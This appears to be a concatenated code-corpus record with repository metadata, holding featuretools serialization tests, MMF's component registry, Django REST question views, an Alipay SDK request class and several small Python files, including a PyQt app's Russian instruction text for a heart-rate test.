# TODO: tmp file disappears after deserialize step, cannot check equality with Dask, Koalas
def test_serialize_s3_anon_csv(es, s3_client, s3_bucket):
if es.dataframe_type != Library.PANDAS.value:
pytest.xfail('tmp file disappears after deserialize step, cannot check equality with Dask or Koalas')
es.to_csv(TEST_S3_URL, encoding='utf-8', engine='python', profile_name=False)
make_public(s3_client, s3_bucket)
new_es = deserialize.read_entityset(TEST_S3_URL, profile_name=False)
assert es.__eq__(new_es, deep=True)
# Dask/Koalas do not support to_pickle
def test_serialize_s3_anon_pickle(pd_es, s3_client, s3_bucket):
pd_es.to_pickle(TEST_S3_URL, profile_name=False)
make_public(s3_client, s3_bucket)
new_es = deserialize.read_entityset(TEST_S3_URL, profile_name=False)
assert pd_es.__eq__(new_es, deep=True)
# TODO: tmp file disappears after deserialize step, cannot check equality with Dask, Koalas
def test_serialize_s3_anon_parquet(es, s3_client, s3_bucket):
if es.dataframe_type != Library.PANDAS.value:
pytest.xfail('tmp file disappears after deserialize step, cannot check equality with Dask')
es.to_parquet(TEST_S3_URL, profile_name=False)
make_public(s3_client, s3_bucket)
new_es = deserialize.read_entityset(TEST_S3_URL, profile_name=False)
assert es.__eq__(new_es, deep=True)
def create_test_credentials(test_path):
with open(test_path, "w+") as f:
f.write("[test]\n")
f.write("aws_access_key_id=AKIAIOSFODNN7EXAMPLE\n")
f.write("aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n")
def create_test_config(test_path_config):
with open(test_path_config, "w+") as f:
f.write("[profile test]\n")
f.write("region=us-east-2\n")
f.write("output=text\n")
@pytest.fixture
def setup_test_profile(monkeypatch, tmpdir):
cache = str(tmpdir.join('.cache').mkdir())
test_path = os.path.join(cache, 'test_credentials')
test_path_config = os.path.join(cache, 'test_config')
monkeypatch.setenv("AWS_SHARED_CREDENTIALS_FILE", test_path)
monkeypatch.setenv("AWS_CONFIG_FILE", test_path_config)
monkeypatch.delenv("AWS_ACCESS_KEY_ID", raising=False)
monkeypatch.delenv("AWS_SECRET_ACCESS_KEY", raising=False)
monkeypatch.setenv("AWS_PROFILE", "test")
try:
os.remove(test_path)
os.remove(test_path_config)
except OSError:
pass
create_test_credentials(test_path)
create_test_config(test_path_config)
yield
os.remove(test_path)
os.remove(test_path_config)
def test_s3_test_profile(es, s3_client, s3_bucket, setup_test_profile):
if es.dataframe_type != Library.PANDAS.value:
pytest.xfail('tmp file disappears after deserialize step, cannot check equality with Dask')
es.to_csv(TEST_S3_URL, encoding='utf-8', engine='python', profile_name='test')
make_public(s3_client, s3_bucket)
new_es = deserialize.read_entityset(TEST_S3_URL, profile_name='test')
assert es.__eq__(new_es, deep=True)
def test_serialize_url_csv(es):
error_text = "Writing to URLs is not supported"
with pytest.raises(ValueError, match=error_text):
es.to_csv(URL, encoding='utf-8', engine='python')
def test_serialize_subdirs_not_removed(es, tmpdir):
write_path = tmpdir.mkdir("test")
test_dir = write_path.mkdir("test_dir")
with open(str(write_path.join('data_description.json')), 'w') as f:
json.dump('__SAMPLE_TEXT__', f)
if es.dataframe_type == Library.KOALAS.value:
compression = 'none'
else:
compression = None
serialize.write_data_description(es, path=str(write_path), index='1', sep='\t', encoding='utf-8', compression=compression)
assert os.path.exists(str(test_dir))
with open(str(write_path.join('data_description.json')), 'r') as f:
assert '__SAMPLE_TEXT__' not in json.load(f)
def test_deserialize_local_tar(es):
with tempfile.TemporaryDirectory() as tmpdir:
temp_tar_filepath = os.path.join(tmpdir, TEST_FILE)
urlretrieve(URL, filename=temp_tar_filepath)
new_es = deserialize.read_entityset(temp_tar_filepath)
assert es.__eq__(new_es, deep=True)
def test_deserialize_url_csv(es):
new_es = deserialize.read_entityset(URL)
assert es.__eq__(new_es, deep=True)
def test_default_s3_csv(es):
new_es = deserialize.read_entityset(S3_URL)
assert es.__eq__(new_es, deep=True)
def test_anon_s3_csv(es):
new_es = deserialize.read_entityset(S3_URL, profile_name=False)
assert es.__eq__(new_es, deep=True)
def test_operations_invalidate_metadata(es):
new_es = EntitySet(id="test")
# test metadata gets created on access
assert new_es._data_description is None
assert new_es.metadata is not None # generated after access
assert new_es._data_description is not None
if not isinstance(es['customers'], pd.DataFrame):
customers_ltypes = es["customers"].ww.logical_types
customers_ltypes['signup_date'] = Datetime
else:
customers_ltypes = None
new_es.add_dataframe(es["customers"],
"customers",
index=es["customers"].index,
logical_types=customers_ltypes)
if not isinstance(es['sessions'], pd.DataFrame):
sessions_ltypes = es["sessions"].ww.logical_types
else:
sessions_ltypes = None
new_es.add_dataframe(es["sessions"],
"sessions",
index=es["sessions"].index,
logical_types=sessions_ltypes)
assert new_es._data_description is None
assert new_es.metadata is not None
assert new_es._data_description is not None
new_es = new_es.add_relationship("customers", "id", "sessions", "customer_id")
assert new_es._data_description is None
assert new_es.metadata is not None
assert new_es._data_description is not None
new_es = new_es.normalize_dataframe("customers", "cohort", "cohort")
assert new_es._data_description is None
assert new_es.metadata is not None
assert new_es._data_description is not None
new_es.add_last_time_indexes()
assert new_es._data_description is None
assert new_es.metadata is not None
assert new_es._data_description is not None
# automatically adding interesting values not supported in Dask or Koalas
if new_es.dataframe_type == Library.PANDAS.value:
new_es.add_interesting_values()
assert new_es._data_description is None
assert new_es.metadata is not None
assert new_es._data_description is not None
def test_reset_metadata(es):
assert es.metadata is not None
assert es._data_description is not None
es.reset_data_description()
assert es._data_description is None
def test_later_schema_version(es, caplog):
def test_version(major, minor, patch, raises=True):
version = '.'.join([str(v) for v in [major, minor, patch]])
if raises:
warning_text = ('The schema version of the saved entityset'
'(%s) is greater than the latest supported (%s). '
'You may need to upgrade featuretools. Attempting to load entityset ...'
% (version, SCHEMA_VERSION))
else:
warning_text = None
_check_schema_version(version, es, warning_text, caplog, 'warn')
major, minor, patch = [int(s) for s in SCHEMA_VERSION.split('.')]
test_version(major + 1, minor, patch)
test_version(major, minor + 1, patch)
test_version(major, minor, patch + 1)
test_version(major, minor - 1, patch + 1, raises=False)
def test_earlier_schema_version(es, caplog):
def test_version(major, minor, patch, raises=True):
version = '.'.join([str(v) for v in [major, minor, patch]])
if raises:
warning_text = ('The schema version of the saved entityset'
'(%s) is no longer supported by this version '
'of featuretools. Attempting to load entityset ...'
% (version))
else:
warning_text = None
_check_schema_version(version, es, warning_text, caplog, 'log')
major, minor, patch = [int(s) for s in SCHEMA_VERSION.split('.')]
test_version(major - 1, minor, patch)
test_version(major, minor - 1, patch, raises=False)
test_version(major, minor, patch - 1, raises=False)
def _check_schema_version(version, es, warning_text, caplog, warning_type=None):
dataframes = {dataframe.ww.name: typing_info_to_dict(dataframe) for dataframe in es.dataframes}
relationships = [relationship.to_dictionary() for relationship in es.relationships]
dictionary = {
'schema_version': version,
'id': es.id,
'dataframes': dataframes,
'relationships': relationships,
}
if warning_type == 'log' and warning_text:
logger = logging.getLogger('featuretools')
logger.propagate = True
deserialize.description_to_entityset(dictionary)
assert warning_text in caplog.text
logger.propagate = False
elif warning_type == 'warn' and warning_text:
with pytest.warns(UserWarning) as record:
deserialize.description_to_entityset(dictionary)
assert record[0].message.args[0] == warning_text
else:
deserialize.description_to_entityset(dictionary)
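# A hedged, minimal illustration of the round-trip pattern most tests above
# rely on; the toy dataframe and helper name are illustrative only.
def _roundtrip_example(tmp_path):
    df = pd.DataFrame({'id': [0, 1, 2], 'value': [10, 20, 30]})
    es = EntitySet(id='example')
    es.add_dataframe(dataframe=df, dataframe_name='data', index='id')
    es.to_csv(str(tmp_path))
    new_es = deserialize.read_entityset(str(tmp_path))
    return es.__eq__(new_es, deep=True)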
| 38.374477
| 126
| 0.71973
|
65f50cd1ab08b668d8b0446b3706294273164321
| 11,701
|
py
|
Python
|
mmf/common/registry.py
|
san2597/mmf
|
c0812e9281c6e679cb7f00af78a5eda267820aab
|
[
"BSD-3-Clause"
] | 2
|
2021-02-22T12:15:42.000Z
|
2021-05-02T15:22:24.000Z
|
mmf/common/registry.py
|
san2597/mmf
|
c0812e9281c6e679cb7f00af78a5eda267820aab
|
[
"BSD-3-Clause"
] | 7
|
2021-03-01T21:16:26.000Z
|
2022-02-27T07:07:11.000Z
|
mmf/common/registry.py
|
krantirk/MMF
|
2e4acaad7ca8eee4319e1205a560eed81733a0be
|
[
"BSD-3-Clause"
] | 1
|
2022-03-04T14:19:43.000Z
|
2022-03-04T14:19:43.000Z
|
# Copyright (c) Facebook, Inc. and its affiliates.
"""
Registry is the central source of truth in MMF. Inspired by Redux's
concept of global store, Registry maintains mappings of various information
to unique keys. Special functions in registry can be used as decorators to
register different kind of classes.
Import the global registry object using
``from mmf.common.registry import registry``
Various decorators for registering different kinds of classes with unique keys
- Register a trainer: ``@registry.register_trainer``
- Register a dataset builder: ``@registry.register_builder``
- Register a metric: ``@registry.register_metric``
- Register a loss: ``@registry.register_loss``
- Register a fusion technique: ``@registry.register_fusion``
- Register a model: ``@registry.register_model``
- Register a processor: ``@registry.register_processor``
- Register a optimizer: ``@registry.register_optimizer``
- Register a scheduler: ``@registry.register_scheduler``
- Register a decoder: ``@registry.register_decoder``
"""
from mmf.utils.env import setup_imports
class Registry:
r"""Class for registry object which acts as central source of truth
for MMF
"""
mapping = {
# Mappings of builder name to their respective classes
# Use `registry.register_builder` to register a builder class
# with a specific name
# Further, use the name with the class is registered in the
# command line or configuration to load that specific dataset
"builder_name_mapping": {},
# Similar to the builder_name_mapping above except that this
# one is used to keep a mapping for dataset to its trainer class.
"trainer_name_mapping": {},
"model_name_mapping": {},
"metric_name_mapping": {},
"loss_name_mapping": {},
"fusion_name_mapping": {},
"optimizer_name_mapping": {},
"scheduler_name_mapping": {},
"processor_name_mapping": {},
"decoder_name_mapping": {},
"state": {},
}
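# A hedged illustration, not part of the upstream class: after
#     @registry.register_model("pythia")
#     class Pythia(BaseModel): ...
# the class object is reachable as
#     Registry.mapping["model_name_mapping"]["pythia"]
# which is the mapping the registry's lookup helpers resolve against.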
@classmethod
def register_trainer(cls, name):
r"""Register a trainer to registry with key 'name'
Args:
name: Key with which the trainer will be registered.
Usage::
from mmf.common.registry import registry
from mmf.trainers.custom_trainer import CustomTrainer
@registry.register_trainer("custom_trainer")
class CustomTrainer():
...
"""
def wrap(trainer_cls):
cls.mapping["trainer_name_mapping"][name] = trainer_cls
return trainer_cls
return wrap
@classmethod
def register_builder(cls, name):
r"""Register a dataset builder to registry with key 'name'
Args:
            name: Key with which the dataset builder will be registered.
Usage::
from mmf.common.registry import registry
from mmf.datasets.base_dataset_builder import BaseDatasetBuilder
@registry.register_builder("vqa2")
class VQA2Builder(BaseDatasetBuilder):
...
"""
def wrap(builder_cls):
from mmf.datasets.base_dataset_builder import BaseDatasetBuilder
assert issubclass(
builder_cls, BaseDatasetBuilder
), "All builders must inherit BaseDatasetBuilder class"
cls.mapping["builder_name_mapping"][name] = builder_cls
return builder_cls
return wrap
@classmethod
def register_metric(cls, name):
r"""Register a metric to registry with key 'name'
Args:
name: Key with which the metric will be registered.
Usage::
from mmf.common.registry import registry
from mmf.modules.metrics import BaseMetric
@registry.register_metric("r@1")
class RecallAt1(BaseMetric):
...
"""
def wrap(func):
from mmf.modules.metrics import BaseMetric
assert issubclass(
func, BaseMetric
), "All Metric must inherit BaseMetric class"
cls.mapping["metric_name_mapping"][name] = func
return func
return wrap
@classmethod
def register_loss(cls, name):
r"""Register a loss to registry with key 'name'
Args:
name: Key with which the loss will be registered.
Usage::
from mmf.common.registry import registry
from torch import nn
@registry.register_task("logit_bce")
class LogitBCE(nn.Module):
...
"""
def wrap(func):
from torch import nn
assert issubclass(
func, nn.Module
), "All loss must inherit torch.nn.Module class"
cls.mapping["loss_name_mapping"][name] = func
return func
return wrap
@classmethod
def register_fusion(cls, name):
r"""Register a fusion technique to registry with key 'name'
Args:
name: Key with which the fusion technique will be registered
Usage::
from mmf.common.registry import registry
from torch import nn
@registry.register_fusion("linear_sum")
        class LinearSum(nn.Module):
...
"""
def wrap(func):
from torch import nn
assert issubclass(
func, nn.Module
), "All Fusion must inherit torch.nn.Module class"
cls.mapping["fusion_name_mapping"][name] = func
return func
return wrap
@classmethod
def register_model(cls, name):
r"""Register a model to registry with key 'name'
Args:
name: Key with which the model will be registered.
Usage::
from mmf.common.registry import registry
from mmf.models.base_model import BaseModel
@registry.register_task("pythia")
class Pythia(BaseModel):
...
"""
def wrap(func):
from mmf.models.base_model import BaseModel
assert issubclass(
func, BaseModel
), "All models must inherit BaseModel class"
cls.mapping["model_name_mapping"][name] = func
return func
return wrap
@classmethod
def register_processor(cls, name):
r"""Register a processor to registry with key 'name'
Args:
name: Key with which the processor will be registered.
Usage::
from mmf.common.registry import registry
from mmf.datasets.processors import BaseProcessor
@registry.register_task("glove")
class GloVe(BaseProcessor):
...
"""
def wrap(func):
from mmf.datasets.processors.processors import BaseProcessor
assert issubclass(
func, BaseProcessor
), "All Processor classes must inherit BaseProcessor class"
cls.mapping["processor_name_mapping"][name] = func
return func
return wrap
@classmethod
def register_optimizer(cls, name):
def wrap(func):
cls.mapping["optimizer_name_mapping"][name] = func
return func
return wrap
@classmethod
def register_scheduler(cls, name):
def wrap(func):
cls.mapping["scheduler_name_mapping"][name] = func
return func
return wrap
@classmethod
def register_decoder(cls, name):
r"""Register a decoder to registry with key 'name'
Args:
name: Key with which the decoder will be registered.
Usage::
from mmf.common.registry import registry
from mmf.utils.text import TextDecoder
@registry.register_decoder("nucleus_sampling")
class NucleusSampling(TextDecoder):
...
"""
def wrap(decoder_cls):
from mmf.utils.text import TextDecoder
assert issubclass(
decoder_cls, TextDecoder
), "All decoders must inherit TextDecoder class"
cls.mapping["decoder_name_mapping"][name] = decoder_cls
return decoder_cls
return wrap
@classmethod
def register(cls, name, obj):
r"""Register an item to registry with key 'name'
Args:
name: Key with which the item will be registered.
Usage::
from mmf.common.registry import registry
registry.register("config", {})
"""
path = name.split(".")
current = cls.mapping["state"]
for part in path[:-1]:
if part not in current:
current[part] = {}
current = current[part]
current[path[-1]] = obj
@classmethod
def get_trainer_class(cls, name):
return cls.mapping["trainer_name_mapping"].get(name, None)
@classmethod
def get_builder_class(cls, name):
return cls.mapping["builder_name_mapping"].get(name, None)
@classmethod
def get_model_class(cls, name):
return cls.mapping["model_name_mapping"].get(name, None)
@classmethod
def get_processor_class(cls, name):
return cls.mapping["processor_name_mapping"].get(name, None)
@classmethod
def get_metric_class(cls, name):
return cls.mapping["metric_name_mapping"].get(name, None)
@classmethod
def get_loss_class(cls, name):
return cls.mapping["loss_name_mapping"].get(name, None)
@classmethod
def get_optimizer_class(cls, name):
return cls.mapping["optimizer_name_mapping"].get(name, None)
@classmethod
def get_scheduler_class(cls, name):
return cls.mapping["scheduler_name_mapping"].get(name, None)
@classmethod
def get_decoder_class(cls, name):
return cls.mapping["decoder_name_mapping"].get(name, None)
@classmethod
def get(cls, name, default=None, no_warning=False):
r"""Get an item from registry with key 'name'
Args:
name (string): Key whose value needs to be retrieved.
default: If passed and key is not in registry, default value will
be returned with a warning. Default: None
no_warning (bool): If passed as True, warning when key doesn't exist
will not be generated. Useful for MMF's
internal operations. Default: False
Usage::
from mmf.common.registry import registry
config = registry.get("config")
"""
original_name = name
name = name.split(".")
value = cls.mapping["state"]
for subname in name:
value = value.get(subname, default)
if value is default:
break
if (
"writer" in cls.mapping["state"]
and value == default
and no_warning is False
):
cls.mapping["state"]["writer"].write(
"Key {} is not present in registry, returning default value "
"of {}".format(original_name, default)
)
return value
@classmethod
def unregister(cls, name):
r"""Remove an item from registry with key 'name'
Args:
name: Key which needs to be removed.
Usage::
from mmf.common.registry import registry
config = registry.unregister("config")
"""
return cls.mapping["state"].pop(name, None)
registry = Registry()
setup_imports()
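# --- Hedged usage sketch (not part of the original module) ---
# A minimal illustration of the generic register()/get()/unregister() state
# helpers defined above. The dotted key "config.training.batch_size" and its
# value are made-up examples, not anything MMF itself registers.
if __name__ == "__main__":
    # register() creates intermediate dicts on demand for dotted keys.
    registry.register("config.training.batch_size", 32)
    # get() walks the same dotted path; a default comes back when any part
    # of the path is missing.
    assert registry.get("config.training.batch_size") == 32
    assert registry.get("config.training.lr", default=None, no_warning=True) is None
    # unregister() drops the whole top-level entry again.
    registry.unregister("config")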
| 28.539024
| 80
| 0.597214
|
a8baa06a1f4f9569c0e3b5773b6e905103f2b117
| 5,467
|
py
|
Python
|
UCourse/questions/views.py
|
Natsu1270/UCourse
|
e8c814d91e54f5f51e4a0fa2df177ebb59544dc2
|
[
"MIT"
] | 1
|
2020-08-31T22:40:27.000Z
|
2020-08-31T22:40:27.000Z
|
UCourse/questions/views.py
|
Natsu1270/UCourse
|
e8c814d91e54f5f51e4a0fa2df177ebb59544dc2
|
[
"MIT"
] | 13
|
2020-08-05T16:17:09.000Z
|
2022-03-12T00:18:42.000Z
|
UCourse/questions/views.py
|
Natsu1270/UCourse
|
e8c814d91e54f5f51e4a0fa2df177ebb59544dc2
|
[
"MIT"
] | null | null | null |
from django.db.models import Q
from rest_framework import generics, permissions, status
from rest_framework.response import Response
from questions import serializers
from questions.models import Question, Choice
from exams.models import Exam
from copy import deepcopy
class QuestionDetailAPI(generics.RetrieveUpdateDestroyAPIView):
permission_classes = [
permissions.IsAuthenticated
]
serializer_class = serializers.QuestionSerializer
queryset = Question.objects.all()
class QuestionListAPI(generics.ListCreateAPIView):
permission_classes = [
permissions.IsAuthenticated
]
serializer_class = serializers.QuestionSerializer
queryset = Question.objects.all()
class CreateQuestionAPI(generics.GenericAPIView):
serializer_class = serializers.QuestionMinSerializer
permission_classes = [
permissions.IsAuthenticated
]
def post(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
exam_id = request.data.get('exam', None)
choices = request.data.get('choices', [])
serializer.is_valid(raise_exception=True)
data = serializer.validated_data
question = serializer.save()
if exam_id is not None:
exam = Exam.objects.get(pk=request.data['exam'])
question.question_exams.add(exam)
question.save()
for choice in choices:
new_choice = Choice.objects.create(content=choice['content'])
question.choices.add(new_choice)
if choice['isAnswer'] and choice['isAnswer'] is True:
question.answers.add(new_choice)
question.created_by = self.request.user
question.save()
return Response({
"data": serializers.QuestionSerializer(instance=question).data,
"result": True,
"message": "Register successfully",
"status_code": 201
}, status=status.HTTP_201_CREATED)
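# --- Hedged illustration (not part of the original module) ---
# Shape of the request body that CreateQuestionAPI.post above reads: an
# optional "exam" primary key plus a "choices" list whose items carry
# "content" and an "isAnswer" flag. Question-level fields validated by
# QuestionMinSerializer are not shown in this file, so the dict below only
# sketches the keys the view itself touches; the values are placeholders.
EXAMPLE_CREATE_QUESTION_PAYLOAD = {
    "exam": 1,  # optional; must be the pk of an existing Exam
    "choices": [
        {"content": "Paris", "isAnswer": True},
        {"content": "Rome", "isAnswer": False},
    ],
}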
class EditQuestionAPI(generics.GenericAPIView):
serializer_class = serializers.QuestionMinSerializer
permission_classes = [permissions.IsAuthenticated]
def post(self, request, *args, **kwargs):
choices = request.data['choices']
question_id = request.data['id']
instance = Question.objects.get(pk=question_id)
serializer = self.get_serializer(instance, data=request.data, partial=True)
serializer.is_valid(raise_exception=True)
question = serializer.save()
old_choices = instance.choices
old_answers = instance.answers
new_choice_ids = list()
for choice in choices:
if 'id' in choice and choice['id']:
new_choice_ids.append(choice['id'])
old_choice = old_choices.get(pk=choice['id'])
old_choice.content = choice['content']
old_choice.save()
is_answers = old_answers.filter(pk=choice['id'])
if len(is_answers) == 0 and (choice['isAnswer'] and choice['isAnswer'] is True):
question.answers.add(old_choice)
if len(is_answers) > 0 and (choice['isAnswer'] is None or choice['isAnswer'] is False):
question.answers.remove(old_choice)
else:
new_choice = Choice.objects.create(content=choice['content'])
new_choice_ids.append(new_choice.id)
question.choices.add(new_choice)
if choice['isAnswer'] and choice['isAnswer'] is True:
question.answers.add(new_choice)
for choice in old_choices.all():
if choice.id not in new_choice_ids:
choice.delete()
        question.save()  # Model.save() returns None, so keep the saved instance for the response below
return Response({
"data": serializers.QuestionSerializer(instance=question).data,
"result": True, "message": "Edit question successfully", "status_code": 201
}, status=status.HTTP_200_OK)
class GetQuestionsByTeacher(generics.GenericAPIView):
permission_classes = [permissions.IsAuthenticated]
def get(self, request, *args, **kwargs):
user = self.request.user
queryset = Question.objects.filter(created_by=user).order_by('-created_date')
return Response(
data=serializers.QuestionSerializer(instance=queryset, many=True).data,
status=status.HTTP_200_OK
)
class GetQuestionsByTeacherRemain(generics.GenericAPIView):
permission_classes = [permissions.IsAuthenticated]
def get(self, request, *args, **kwargs):
user = self.request.user
exam_id = self.request.query_params.get('examId')
exam = Exam.objects.get(pk=exam_id)
queryset = Question.objects.filter(Q(created_by=user) & ~Q(question_exams__in=[exam])).order_by('-created_date')
return Response(
data=serializers.QuestionSerializer(instance=queryset, many=True).data,
status=status.HTTP_200_OK
)
class AddToExam(generics.GenericAPIView):
permission_classes = [permissions.IsAuthenticated]
def post(self, request, *args, **kwargs):
exam_id = self.request.data.get('examId')
exam = Exam.objects.get(pk=exam_id)
rows = self.request.data.get('rows')
for question_id in rows:
exam.questions.add(question_id)
exam.save()
return Response({
"result": True
}, status=status.HTTP_200_OK)
| 35.5
| 120
| 0.651546
|
4d0dde9e150e96ac17d650e26fcd21708ec64c2f
| 98
|
py
|
Python
|
IAF/layers/__init__.py
|
MrHuff/DIF-NLDL
|
4d032cb0522efd62ea754a6c5d02b7015ef2f62b
|
[
"MIT"
] | null | null | null |
IAF/layers/__init__.py
|
MrHuff/DIF-NLDL
|
4d032cb0522efd62ea754a6c5d02b7015ef2f62b
|
[
"MIT"
] | null | null | null |
IAF/layers/__init__.py
|
MrHuff/DIF-NLDL
|
4d032cb0522efd62ea754a6c5d02b7015ef2f62b
|
[
"MIT"
] | null | null | null |
from IAF.layers.linear import LinearVariational
from IAF.layers.autoregressive import LinearMasked
| 49
| 50
| 0.887755
|
77291388aef5b8fe94df0a92ffb88ce80d27746d
| 465
|
py
|
Python
|
minigest/fisco/viewsets/natura_operazione_iva.py
|
ctrlmaniac/minigest
|
2bfceb57e41c872e4112e24d0e6991164846888b
|
[
"MIT"
] | null | null | null |
minigest/fisco/viewsets/natura_operazione_iva.py
|
ctrlmaniac/minigest
|
2bfceb57e41c872e4112e24d0e6991164846888b
|
[
"MIT"
] | 1
|
2021-09-22T19:10:20.000Z
|
2021-09-22T19:10:20.000Z
|
minigest/fisco/viewsets/natura_operazione_iva.py
|
ctrlmaniac/minigest
|
2bfceb57e41c872e4112e24d0e6991164846888b
|
[
"MIT"
] | null | null | null |
from django.conf import settings
from rest_framework import permissions, viewsets
from ..models import NaturaOperazioneIVA
from ..serializers import NaturaOperazioneIVASerializer
permission = permissions.AllowAny if settings.DEBUG else permissions.IsAuthenticated
class NaturaOperazioneIVAViewSet(viewsets.ModelViewSet):
permission_classes = [permission]
queryset = NaturaOperazioneIVA.objects.all()
serializer_class = NaturaOperazioneIVASerializer
| 33.214286
| 84
| 0.84086
|
ba8484d67d3402df53526f4655dd8c886a795620
| 199
|
py
|
Python
|
testData/search/grandChildKeywordArgumentWithPythonClass.py
|
alek-sun/pydantic-pycharm-plugin
|
6b07519aadf0ff8b8a644c1f9ede88e09c687c80
|
[
"Apache-2.0",
"MIT"
] | 238
|
2019-08-05T12:46:09.000Z
|
2022-03-25T08:53:25.000Z
|
testData/search/grandChildKeywordArgumentWithPythonClass.py
|
alek-sun/pydantic-pycharm-plugin
|
6b07519aadf0ff8b8a644c1f9ede88e09c687c80
|
[
"Apache-2.0",
"MIT"
] | 415
|
2019-07-15T17:39:35.000Z
|
2022-03-31T01:18:38.000Z
|
testData/search/grandChildKeywordArgumentWithPythonClass.py
|
collerek/pydantic-pycharm-plugin
|
7068ece42334cc9fbe927d779d199c86d5139888
|
[
"Apache-2.0",
"MIT"
] | 7
|
2019-08-09T01:03:16.000Z
|
2022-02-08T03:28:19.000Z
|
from pydantic import BaseModel, validator
class A(BaseModel):
pass
class B(A):
pass
class D:
pass
class C(B, D):
pass
A(abc='cde')
B(abc='cde')
C(ab<caret>c='cde')
## count: 0
| 9.47619
| 41
| 0.603015
|
c4489da0bf4aed6aface1a931557eaff74b55e98
| 3,986
|
py
|
Python
|
alipay/aop/api/request/ZhimaCreditPeZmgoAgreementQueryRequest.py
|
antopen/alipay-sdk-python-all
|
8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c
|
[
"Apache-2.0"
] | 213
|
2018-08-27T16:49:32.000Z
|
2021-12-29T04:34:12.000Z
|
alipay/aop/api/request/ZhimaCreditPeZmgoAgreementQueryRequest.py
|
antopen/alipay-sdk-python-all
|
8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c
|
[
"Apache-2.0"
] | 29
|
2018-09-29T06:43:00.000Z
|
2021-09-02T03:27:32.000Z
|
alipay/aop/api/request/ZhimaCreditPeZmgoAgreementQueryRequest.py
|
antopen/alipay-sdk-python-all
|
8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c
|
[
"Apache-2.0"
] | 59
|
2018-08-27T16:59:26.000Z
|
2022-03-25T10:08:15.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.FileItem import FileItem
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.ZhimaCreditPeZmgoAgreementQueryModel import ZhimaCreditPeZmgoAgreementQueryModel
class ZhimaCreditPeZmgoAgreementQueryRequest(object):
def __init__(self, biz_model=None):
self._biz_model = biz_model
self._biz_content = None
self._version = "1.0"
self._terminal_type = None
self._terminal_info = None
self._prod_code = None
self._notify_url = None
self._return_url = None
self._udf_params = None
self._need_encrypt = False
@property
def biz_model(self):
return self._biz_model
@biz_model.setter
def biz_model(self, value):
self._biz_model = value
@property
def biz_content(self):
return self._biz_content
@biz_content.setter
def biz_content(self, value):
if isinstance(value, ZhimaCreditPeZmgoAgreementQueryModel):
self._biz_content = value
else:
self._biz_content = ZhimaCreditPeZmgoAgreementQueryModel.from_alipay_dict(value)
@property
def version(self):
return self._version
@version.setter
def version(self, value):
self._version = value
@property
def terminal_type(self):
return self._terminal_type
@terminal_type.setter
def terminal_type(self, value):
self._terminal_type = value
@property
def terminal_info(self):
return self._terminal_info
@terminal_info.setter
def terminal_info(self, value):
self._terminal_info = value
@property
def prod_code(self):
return self._prod_code
@prod_code.setter
def prod_code(self, value):
self._prod_code = value
@property
def notify_url(self):
return self._notify_url
@notify_url.setter
def notify_url(self, value):
self._notify_url = value
@property
def return_url(self):
return self._return_url
@return_url.setter
def return_url(self, value):
self._return_url = value
@property
def udf_params(self):
return self._udf_params
@udf_params.setter
def udf_params(self, value):
if not isinstance(value, dict):
return
self._udf_params = value
@property
def need_encrypt(self):
return self._need_encrypt
@need_encrypt.setter
def need_encrypt(self, value):
self._need_encrypt = value
def add_other_text_param(self, key, value):
if not self.udf_params:
self.udf_params = dict()
self.udf_params[key] = value
def get_params(self):
params = dict()
params[P_METHOD] = 'zhima.credit.pe.zmgo.agreement.query'
params[P_VERSION] = self.version
if self.biz_model:
params[P_BIZ_CONTENT] = json.dumps(obj=self.biz_model.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
if self.biz_content:
if hasattr(self.biz_content, 'to_alipay_dict'):
params['biz_content'] = json.dumps(obj=self.biz_content.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
else:
params['biz_content'] = self.biz_content
if self.terminal_type:
params['terminal_type'] = self.terminal_type
if self.terminal_info:
params['terminal_info'] = self.terminal_info
if self.prod_code:
params['prod_code'] = self.prod_code
if self.notify_url:
params['notify_url'] = self.notify_url
if self.return_url:
params['return_url'] = self.return_url
if self.udf_params:
params.update(self.udf_params)
return params
def get_multipart_params(self):
multipart_params = dict()
return multipart_params
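# --- Hedged usage sketch (not part of the original SDK file) ---
# Illustrates how this request object is typically filled in before
# get_params() assembles the key/value pairs for signing. The notify URL is a
# placeholder, and constructing an empty ZhimaCreditPeZmgoAgreementQueryModel
# assumes the usual SDK pattern of optional fields defaulting to None and the
# model exposing to_alipay_dict().
if __name__ == '__main__':
    request = ZhimaCreditPeZmgoAgreementQueryRequest()
    request.biz_content = ZhimaCreditPeZmgoAgreementQueryModel()
    request.notify_url = 'https://example.com/alipay/notify'
    print(request.get_params())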
| 27.489655
| 148
| 0.64576
|
e24ada44bd2fdf1df6a5105db9607918a2b01ace
| 2,526
|
py
|
Python
|
instr.py
|
frorruchi/HeartCheck
|
2e2dd3dfaaad2c1166c10ff6352d4170c3a41604
|
[
"CC0-1.0"
] | null | null | null |
instr.py
|
frorruchi/HeartCheck
|
2e2dd3dfaaad2c1166c10ff6352d4170c3a41604
|
[
"CC0-1.0"
] | null | null | null |
instr.py
|
frorruchi/HeartCheck
|
2e2dd3dfaaad2c1166c10ff6352d4170c3a41604
|
[
"CC0-1.0"
] | null | null | null |
from PyQt5.QtCore import QTime
win_x, win_y = 200, 100
win_width, win_height = 1000, 600
txt_hello = 'Добро пожаловать в программу по определению состояния здоровья!'
txt_next = 'Начать'
txt_instruction = ('Данное приложение позволит вам с помощью теста Руфье провести первичную диагностику вашего здоровья.\n'
'Проба Руфье представляет собой нагрузочный комплекс, предназначенный для оценки работоспособности сердца при физической нагрузке.\n'
'У испытуемого, находящегося в положении лежа на спине в течение 5 мин, определяют частоту пульса за 15 секунд;\n'
'затем в течение 45 секунд испытуемый выполняет 30 приседаний.\n'
'После окончания нагрузки испытуемый ложится, и у него вновь подсчитывается число пульсаций за первые 15 секунд,\n'
'а потом — за последние 15 секунд первой минуты периода восстановления.\n'
'Важно! Если в процессе проведения испытания вы почувствуете себя плохо (появится головокружение, шум в\n'
'ушах, сильная одышка и др.), то тест необходимо прервать и обратиться к врачу.' )
txt_title = 'Здоровье'
txt_name = 'Введите Ф.И.О.:'
txt_hintname = "Ф.И.О."
txt_hintage = "0"
